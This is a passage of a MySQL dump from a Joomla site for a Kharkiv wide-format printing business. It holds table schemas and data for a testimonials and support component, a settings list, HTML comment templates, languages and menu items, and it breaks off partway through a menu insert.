CREATE TABLE `j25_fst_data` (
  `table` varchar(50) NOT NULL,
  `prikey` varchar(250) NOT NULL,
  PRIMARY KEY (`table`,`prikey`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_fst_data`
--

LOCK TABLES `j25_fst_data` WRITE;
/*!40000 ALTER TABLE `j25_fst_data` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_fst_data` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_fst_emails`
--

DROP TABLE IF EXISTS `j25_fst_emails`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_fst_emails` (
  `id` int(8) NOT NULL AUTO_INCREMENT,
  `tmpl` varchar(50) NOT NULL,
  `body` text NOT NULL,
  `description` varchar(250) NOT NULL,
  `subject` varchar(250) NOT NULL,
  `ishtml` int(11) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `tmpl` (`tmpl`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_fst_emails`
--

LOCK TABLES `j25_fst_emails` WRITE;
/*!40000 ALTER TABLE `j25_fst_emails` DISABLE KEYS */;
INSERT INTO `j25_fst_emails` VALUES (1,'comment','{title} has been added. {moderated_start}This requires moderation.{moderated_end}\n\n{article_type} : {article}\n{name_start}Name: {name}\n{name_end}{email_start}EMail: {email}\n{email_end}{website_start}Website: {website}\n{website_end}{customfields_start}{customfields}\n{customfields_end}Comment Body: \n{body}\n\n{linkmod_start}This comment can be found for moderation {linkmod}.\n\n{linkmod_end}The article for this comment can be viewed {linkart}.','Comment or Testimonial submitted','{title} has been added.{moderated_start} Moderation is required{moderated_end}',0);
/*!40000 ALTER TABLE `j25_fst_emails` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_fst_field`
--

DROP TABLE IF EXISTS `j25_fst_field`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_fst_field` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `description` varchar(250) NOT NULL,
  `type` varchar(50) NOT NULL,
  `default` varchar(250) NOT NULL,
  `allprods` int(11) NOT NULL,
  `alldepts` int(11) NOT NULL,
  `required` int(11) NOT NULL,
  `grouping` varchar(250) NOT NULL,
  `permissions` int(11) NOT NULL,
  `ordering` int(11) NOT NULL,
  `basicsearch` int(11) NOT NULL,
  `advancedsearch` int(11) NOT NULL,
  `inlist` int(11) NOT NULL,
  `published` int(11) NOT NULL,
  `ident` int(11) NOT NULL,
  `peruser` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_fst_field`
--

LOCK TABLES `j25_fst_field` WRITE;
/*!40000 ALTER TABLE `j25_fst_field` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_fst_field` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_fst_field_dept`
--

DROP TABLE IF EXISTS `j25_fst_field_dept`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_fst_field_dept` (
  `field_id` int(11) NOT NULL,
  `ticket_dept_id` int(11) NOT NULL,
  PRIMARY KEY (`field_id`,`ticket_dept_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_fst_field_dept`
--

LOCK TABLES `j25_fst_field_dept` WRITE;
/*!40000 ALTER TABLE `j25_fst_field_dept` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_fst_field_dept` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_fst_field_prod`
--

DROP TABLE IF EXISTS `j25_fst_field_prod`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_fst_field_prod` (
  `field_id` int(11) NOT NULL,
  `prod_id` int(11) NOT NULL,
  PRIMARY KEY (`field_id`,`prod_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_fst_field_prod`
--

LOCK TABLES `j25_fst_field_prod` WRITE;
/*!40000 ALTER TABLE `j25_fst_field_prod` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_fst_field_prod` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_fst_field_values`
--

DROP TABLE IF EXISTS `j25_fst_field_values`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_fst_field_values` (
  `field_id` int(11) NOT NULL,
  `value` varchar(250) NOT NULL,
  PRIMARY KEY (`field_id`,`value`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_fst_field_values`
--

LOCK TABLES `j25_fst_field_values` WRITE;
/*!40000 ALTER TABLE `j25_fst_field_values` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_fst_field_values` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_fst_prod`
--

DROP TABLE IF EXISTS `j25_fst_prod`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_fst_prod` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(250) DEFAULT NULL,
  `description` text,
  `image` varchar(250) DEFAULT NULL,
  `extratext` text,
  `published` tinyint(3) unsigned DEFAULT NULL,
  `ordering` int(10) unsigned DEFAULT NULL,
  `inkb` int(11) NOT NULL,
  `insupport` int(11) NOT NULL,
  `intest` int(11) NOT NULL,
  `import_id` int(11) NOT NULL,
  `access` int(11) NOT NULL,
  `translation` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `import_id` (`import_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_fst_prod`
--

LOCK TABLES `j25_fst_prod` WRITE;
/*!40000 ALTER TABLE `j25_fst_prod` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_fst_prod` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_fst_settings`
--

DROP TABLE IF EXISTS `j25_fst_settings`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_fst_settings` (
  `setting` varchar(50) NOT NULL,
  `value` varchar(250) NOT NULL,
  PRIMARY KEY (`setting`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_fst_settings`
--

LOCK TABLES `j25_fst_settings` WRITE;
/*!40000 ALTER TABLE `j25_fst_settings` DISABLE KEYS */;
INSERT INTO `j25_fst_settings` VALUES ('version','1.13.2'),('fsj_username',''),('fsj_apikey',''),('jquery_include','auto'),('perm_mod_joomla','0'),('perm_article_joomla','0'),('captcha_type','recaptcha'),('recaptcha_public',''),('recaptcha_private',''),('recaptcha_theme','red'),('comments_moderate','0'),('comments_hide_add','1'),('email_on_comment','0'),('comments_who_can_add','0'),('test_use_email','1'),('test_use_website','0'),('commnents_use_email','0'),('commnents_use_website','0'),('hide_powered','1'),('announce_use_content_plugins','0'),('announce_use_content_plugins_list','0'),('announce_comments_allow','0'),('announce_comments_per_page','0'),('announce_per_page','0'),('kb_rate','0'),('kb_comments','0'),('kb_view_top','0'),('kb_show_views','0'),('kb_show_recent','0'),('kb_show_recent_stats','0'),('kb_show_viewed','0'),('kb_show_viewed_stats','0'),('kb_show_rated','0'),('kb_show_rated_stats','0'),('kb_show_dates','0'),('kb_use_content_plugins','0'),('kb_show_art_related','0'),('kb_show_art_products','0'),('kb_show_art_attach','0'),('kb_contents','0'),('kb_smaller_subcat_images','0'),('kb_comments_per_page','0'),('kb_prod_per_page','0'),('kb_art_per_page','0'),('kb_print','0'),('test_moderate','all'),('test_email_on_submit','sergeywasp@mail.ru'),('test_allow_no_product','1'),('test_who_can_add','anyone'),('test_hide_empty_prod','1'),('test_comments_per_page','0'),('skin_style','1'),('support_entire_row','0'),('support_autoassign','0'),('support_assign_open','0'),('support_assign_reply','0'),('support_user_attach','0'),('support_lock_time','0'),('support_show_msg_counts','0'),('support_reference','0'),('support_custom_register','0'),('support_no_logon','0'),('support_no_register','0'),('support_info_cols','0'),('support_actions_as_buttons','0'),('support_choose_handler','0'),('support_dont_check_dupe','0'),('support_admin_refresh','0'),('support_only_admin_open','0'),('support_user_reply_width','0'),('support_admin_reply_width','0'),('support_admin_reply_height','0'),('ticket_label_width','0'),('support_next_prod_click','0'),('support_subject_size','0'),('support_subject_message_hide','0'),('support_filename','0'),('support_subject_at_top','0'),('support_tabs_allopen','0'),('support_tabs_allclosed','0'),('support_tabs_all','0'),('ticket_prod_per_page','0'),('ticket_per_page','0'),('support_restrict_prod','0'),('css_hl','#f0f0f0'),('css_tb','#ffffff'),('css_bo','#e0e0e0'),('use_joomla_page_title_setting','0'),('title_prefix','1'),('content_unpublished_color','#FFF0F0'),('support_email_on_create','0'),('support_email_handler_on_create','0'),('support_email_on_reply','0'),('support_email_handler_on_reply','0'),('support_email_handler_on_forward','0'),('support_email_on_close','0'),('support_email_all_admins','0'),('support_email_all_admins_only_unassigned','0'),('support_email_all_admins_ignore_auto','0'),('support_email_all_admins_can_view','0'),('support_user_can_close','0'),('support_user_can_reopen','0'),('support_advanced','0'),('support_allow_unreg','0'),('support_delete','0'),('support_advanced_default','0'),('support_sceditor','0'),('support_altcat','0'),('support_cronlog_keep','0'),('support_hide_priority','0'),('support_hide_handler','0'),('support_hide_users_tickets','0'),('support_hide_tags','0'),('support_email_unassigned','0'),('support_email_admincc','0'),('support_email_from_name','0'),('support_email_from_address','0'),('support_email_site_name','0'),('support_ea_check','0'),('support_ea_all','0'),('support_ea_reply','0'),('support_ea_type','0'),('support_ea_host','0'),('support_ea_port','0'),('support_ea_username','0'),('support_ea_password','0'),('support_ea_mailbox','0'),('support_user_message','#c0c0ff'),('support_admin_message','#c0ffc0'),('support_private_message','#ffc0c0'),('support_basic_name','0'),('support_basic_username','0'),('support_basic_email','0'),('support_basic_messages','0'),('glossary_faqs','0'),('glossary_kb','0'),('glossary_announce','0'),('glossary_link','0'),('glossary_title','0'),('glossary_use_content_plugins','0'),('glossary_ignore','0'),('glossary_exclude','0'),('faq_popup_width','0'),('faq_popup_height','0'),('faq_popup_inner_width','0'),('faq_use_content_plugins','0'),('faq_use_content_plugins_list','0'),('faq_per_page','0'),('faq_cat_prefix','0'),('date_dt_short',''),('date_dt_long',''),('date_d_short',''),('date_d_long',''),('timezone_offset','0'),('mainmenu_moderate','0'),('mainmenu_support','0');
/*!40000 ALTER TABLE `j25_fst_settings` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_fst_settings_big`
--

DROP TABLE IF EXISTS `j25_fst_settings_big`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_fst_settings_big` (
  `setting` varchar(50) NOT NULL,
  `value` text NOT NULL,
  PRIMARY KEY (`setting`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_fst_settings_big`
--

LOCK TABLES `j25_fst_settings_big` WRITE;
/*!40000 ALTER TABLE `j25_fst_settings_big` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_fst_settings_big` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_fst_settings_view`
--

DROP TABLE IF EXISTS `j25_fst_settings_view`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_fst_settings_view` (
  `setting` varchar(250) NOT NULL,
  `value` text NOT NULL,
  PRIMARY KEY (`setting`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_fst_settings_view`
--

LOCK TABLES `j25_fst_settings_view` WRITE;
/*!40000 ALTER TABLE `j25_fst_settings_view` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_fst_settings_view` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_fst_templates`
--

DROP TABLE IF EXISTS `j25_fst_templates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_fst_templates` (
  `template` varchar(50) NOT NULL,
  `tpltype` int(11) NOT NULL,
  `value` text NOT NULL,
  PRIMARY KEY (`template`,`tpltype`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_fst_templates`
--

LOCK TABLES `j25_fst_templates` WRITE;
/*!40000 ALTER TABLE `j25_fst_templates` DISABLE KEYS */;
INSERT INTO `j25_fst_templates` VALUES ('comments_general',3,'<div class=\'fst_comment\' id=\'{divid}\' {modcolor}>\n	<div class=\'fst_comment_left\'>\n	<div class=\'fst_comment_name\'>{name}</div>\n	{if,website}\n	<div class=\'fst_comment_website\'>{website}</div>\n	{endif}\n	<div class=\'fst_comment_created\'>{created_nice}</div>\n	</div>\n	{moderation}\n	{if,custom}\n	<div class=\'fst_comment_custom\'>{custom}</div>\n	{endif}\n	<div class=\'fst_comment_comment\'>{body}</div>\n  <div class=\'fst_clear\'></div>\n</div>\n<div class=\'fst_clear\'></div>'),('comments_test',3,'<div class=\'fst_comment\' id=\'{divid}\' {modcolor}>\n	<div class=\'fst_comment_left\'>\n	<div class=\'fst_comment_name\'>{name}</div>\n	{if,website}\n	<div class=\'fst_comment_website\'>{website}</div>\n	{endif}\n	<div class=\'fst_comment_created\'>{created_nice}</div>\n	</div>\n	{moderation}\n	{if,custom}\n	<div class=\'fst_comment_custom\'>{custom}</div>\n	{endif}\n	<div class=\'fst_comment_comment\'>{body}</div>\n  <div class=\'fst_clear\'></div>\n</div>\n<div class=\'fst_clear\'></div>'),('comments_testmod',3,'<div class=\'fst_comment\' id=\'fst_comment_{uid}_{id}\' {modcolor}>\n  <div class=\'fst_comment_name\'>{name}</div>\n  {if,website}\n  <div class=\'fst_comment_website\'>{website}</div>\n  {endif}\n  <div class=\'fst_comment_created\'>{created_nice}</div>\n  {moderation}\n  {if,custom}\n  <div class=\'fst_comment_custom\'>{custom}</div>\n  {endif}\n  <div class=\'fst_comment_commentmod\'>{body}</div>\n  <div class=\'fst_clear\'></div>\n</div>\n<div class=\'fst_clear\'></div>');
/*!40000 ALTER TABLE `j25_fst_templates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_fst_user`
--

DROP TABLE IF EXISTS `j25_fst_user`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_fst_user` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `mod_kb` int(11) NOT NULL,
  `mod_test` int(11) NOT NULL,
  `support` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `seeownonly` int(11) NOT NULL,
  `autoassignexc` int(11) NOT NULL,
  `allprods` int(11) NOT NULL,
  `allcats` int(11) NOT NULL,
  `alldepts` int(11) NOT NULL,
  `group_id` int(11) NOT NULL,
  `signature` text NOT NULL,
  `artperm` int(11) NOT NULL,
  `groups` int(11) NOT NULL,
  `settings` text NOT NULL,
  `assignperms` int(11) NOT NULL,
  `allprods_a` int(11) NOT NULL,
  `alldepts_a` int(11) NOT NULL,
  `allcats_a` int(11) NOT NULL,
  `reports` int(11) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `user_id` (`user_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_fst_user`
--

LOCK TABLES `j25_fst_user` WRITE;
/*!40000 ALTER TABLE `j25_fst_user` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_fst_user` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_languages`
--

DROP TABLE IF EXISTS `j25_languages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_languages` (
  `lang_id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `asset_id` int(10) unsigned NOT NULL DEFAULT '0',
  `lang_code` char(7) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL,
  `title` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL,
  `title_native` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL,
  `sef` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL,
  `image` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL,
  `description` varchar(512) COLLATE utf8mb4_unicode_ci NOT NULL,
  `metakey` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `sitename` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `published` int(11) NOT NULL DEFAULT '0',
  `access` int(10) unsigned NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`lang_id`),
  UNIQUE KEY `idx_sef` (`sef`),
  UNIQUE KEY `idx_langcode` (`lang_code`),
  KEY `idx_access` (`access`),
  KEY `idx_ordering` (`ordering`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_languages`
--

LOCK TABLES `j25_languages` WRITE;
/*!40000 ALTER TABLE `j25_languages` DISABLE KEYS */;
INSERT INTO `j25_languages` VALUES (1,0,'en-GB','English (UK)','English (UK)','en','en','','','','',1,0,2),(2,102,'uk-UA','Ukrainian (uk-UA)','Українська (Україна)','uk','uk_ua','','','','',0,1,1);
/*!40000 ALTER TABLE `j25_languages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_menu`
--

DROP TABLE IF EXISTS `j25_menu`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_menu` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `menutype` varchar(24) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The type of menu this item belongs to. FK to #__menu_types.menutype',
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The display title of the menu item.',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL COMMENT 'The SEF alias of the menu item.',
  `note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `path` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The computed path of the menu item based on the alias field.',
  `link` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The actually link the menu item refers to.',
  `type` varchar(16) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The type of link: Component, URL, Alias, Separator',
  `published` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'The published state of the menu link.',
  `parent_id` int(10) unsigned NOT NULL DEFAULT '1' COMMENT 'The parent menu item in the menu tree.',
  `level` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The relative level in the tree.',
  `component_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to #__extensions.id',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to #__users.id',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'The time the menu item was checked out.',
  `browserNav` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'The click behaviour of the link.',
  `access` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The access level required to view the menu item.',
  `img` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The image of the menu item.',
  `template_style_id` int(10) unsigned NOT NULL DEFAULT '0',
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'JSON encoded data for the menu item.',
  `lft` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set lft.',
  `rgt` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set rgt.',
  `home` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Indicates if this menu item is the home or default page.',
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `client_id` tinyint(4) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_client_id_parent_id_alias_language` (`client_id`,`parent_id`,`alias`(100),`language`),
  KEY `idx_componentid` (`component_id`,`menutype`,`published`,`access`),
  KEY `idx_menutype` (`menutype`),
  KEY `idx_left_right` (`lft`,`rgt`),
  KEY `idx_language` (`language`),
  KEY `idx_alias` (`alias`(100)),
  KEY `idx_path` (`path`(100))
) ENGINE=InnoDB AUTO_INCREMENT=259 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_menu`
--

LOCK TABLES `j25_menu` WRITE;
/*!40000 ALTER TABLE `j25_menu` DISABLE KEYS */;
INSERT INTO `j25_menu` VALUES (1,'','Menu_Item_Root','root','','','','',1,0,0,0,0,'0000-00-00 00:00:00',0,0,'',0,'',0,187,0,'*',0),(2,'other-menu','Оборудование','equipment','','equipment','index.php?option=com_content&view=article&id=1','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"Разрешение печати\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',17,26,0,'*',0),(3,'mainmenu','Прайс','price','','price','index.php?option=com_content&view=article&id=2','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\\u0426\\u0435\\u043d\\u0430 \\u043d\\u0430 \\u0448\\u0438\\u0440\\u043e\\u043a\\u043e\\u0444\\u043e\\u0440\\u043c\\u0430\\u0442\\u043d\\u0443\\u044e \\u043f\\u0435\\u0447\\u0430\\u0442\\u044c \\\\| \\u043f\\u0440\\u0430\\u0439\\u0441\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',31,32,0,'*',0),(4,'mainmenu','Контакты','contacts','','contacts','index.php?option=com_content&view=article&id=3','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"feed_summary\":\"\",\"page_title\":\"\\u041a\\u043e\\u043d\\u0442\\u0430\\u043a\\u0442\\u044b. \\u0428\\u0438\\u0440\\u043e\\u043a\\u043e\\u0444\\u043e\\u0440\\u043c\\u0430\\u0442\\u043d\\u0430\\u044f \\u043f\\u0435\\u0447\\u0430\\u0442\\u044c \\u0425\\u0430\\u0440\\u044c\\u043a\\u043e\\u0432, \\u0423\\u043a\\u0440\\u0430\\u0438\\u043d\\u0430\",\"show_page_title\":0,\"pageclass_sfx\":\"\",\"menu_image\":\"\",\"secure\":0,\"show_page_heading\":0}',57,58,0,'*',0),(5,'mainmenu','Обратная связь','2010-11-06-16-50-07','','2010-11-06-16-50-07','index.php?option=com_contact&view=contact&id=1','component',0,1,1,8,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_contact_list\":0,\"show_category_crumb\":0,\"contact_icons\":\"\",\"icon_address\":\"\",\"icon_email\":\"\",\"icon_telephone\":\"\",\"icon_mobile\":\"\",\"icon_fax\":\"\",\"icon_misc\":\"\",\"show_headings\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"allow_vcard\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"page_title\":\"\\u041e\\u0431\\u0440\\u0430\\u0442\\u043d\\u0430\\u044f \\u0441\\u0432\\u044f\\u0437\\u044c - \\u0448\\u0438\\u0440\\u043e\\u043a\\u043e\\u0444\\u043e\\u0440\\u043c\\u0430\\u0442\\u043d\\u0430\\u044f \\u043f\\u0435\\u0447\\u0430\\u0442\\u044c \\u0425\\u0430\\u0440\\u044c\\u043a\\u043e\\u0432\",\"show_page_title\":0,\"pageclass_sfx\":\"\",\"menu_image\":\"\",\"secure\":0,\"show_page_heading\":0}',77,78,0,'*',0),(6,'mainmenu','Услуги','services','','services','index.php?option=com_content&view=article&id=5','component',0,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"feed_summary\":\"\",\"page_title\":\"\\u0426\\u0432\\u0435\\u0442\\u043d\\u0430\\u044f \\u0448\\u0438\\u0440\\u043e\\u043a\\u043e\\u0444\\u043e\\u0440\\u043c\\u0430\\u0442\\u043d\\u0430\\u044f \\u043f\\u0435\\u0447\\u0430\\u0442\\u044c \\u0431\\u0430\\u043d\\u043d\\u0435\\u0440\\u0430 \\u0431\\u0438\\u043b\\u0431\\u043e\\u0440\\u0434\\u043e\\u0432 \\u0431\\u0438\\u0433\\u0431\\u043e\\u0440\\u0434\\u043e\\u0432 \\u043d\\u0430 \\u0441\\u0430\\u043c\\u043e\\u043a\\u043b\\u0435\\u0439\\u043a\\u0435 \\u043d\\u0430 \\u043e\\u0440\\u0430\\u043a\\u0430\\u043b\\u0435 - \\u0425\\u0430\\u0440\\u044c\\u043a\\u043e\\u0432\",\"show_page_title\":0,\"pageclass_sfx\":\"\",\"menu_image\":\"\",\"secure\":0,\"show_page_heading\":0}',73,74,0,'*',0),(7,'dop-menu','Печать на холсте','printing-on-canvas','','printing-on-canvas','index.php?option=com_content&view=article&id=6','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' 